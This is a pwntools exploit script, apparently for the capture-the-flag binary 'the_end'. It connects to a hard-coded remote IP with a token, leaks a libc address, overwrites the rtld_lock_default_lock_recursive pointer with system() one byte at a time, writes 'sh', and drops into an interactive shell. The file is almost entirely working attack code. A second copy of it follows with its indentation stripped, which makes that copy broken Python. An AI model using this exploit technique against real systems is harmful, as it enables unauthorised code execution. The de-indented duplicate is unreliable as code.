hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('./libc64.so')
elf = ELF('./the_end')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "150.109.46.159"
RPORT = 20002
LHOST = "127.0.0.1"
LPORT = 20002

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
    conn.sendlineafter('token', 'R4UKcyMU6RpnypSEewwounQDoDWAADeJ')
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./the_end'], gdbscript=gdbscript)
else:
    conn = process(['./the_end'])
    # conn = process(['./the_end'], env={'LD_PRELOAD': './libc64.so'})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')
conn.recvuntil('here is a gift ')
libc_base = int(conn.recv(14), 16) - 0xcc230
conn.recvline()

addr = libc_base + 0x5f0f48     # this address has address of rtld_lock_default_lock_recursive()
val = p64(libc_base + 0x45390)  # system()

# write 'sh'
conn.send(p64(libc_base + 0x5f0948 ))
conn.send('s')
conn.send(p64(libc_base + 0x5f0948 + 1 ))
conn.send('h')

# write system()
for i in range(3):
    conn.send(p64(addr  + i))
    time.sleep(0.1)
    conn.send(val[i])
    time.sleep(0.1)

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window

	# libc = ELF('./libc64.so')
	elf = ELF('./the_end')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "150.109.46.159"
	RPORT = 20002
	LHOST = "127.0.0.1"
	LPORT = 20002

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	conn.sendlineafter('token', 'R4UKcyMU6RpnypSEewwounQDoDWAADeJ')
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./the_end'], gdbscript=gdbscript)
	else:
	conn = process(['./the_end'])
	# conn = process(['./the_end'], env={'LD_PRELOAD': './libc64.so'})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')
	conn.recvuntil('here is a gift ')
	libc_base = int(conn.recv(14), 16) - 0xcc230
	conn.recvline()

	addr = libc_base + 0x5f0f48 # this address has address of rtld_lock_default_lock_recursive()
	val = p64(libc_base + 0x45390) # system()

	# write 'sh'
	conn.send(p64(libc_base + 0x5f0948 ))
	conn.send('s')
	conn.send(p64(libc_base + 0x5f0948 + 1 ))
	conn.send('h')

	# write system()
	for i in range(3):
	conn.send(p64(addr + i))
	time.sleep(0.1)
	conn.send(val[i])
	time.sleep(0.1)

	conn.interactive()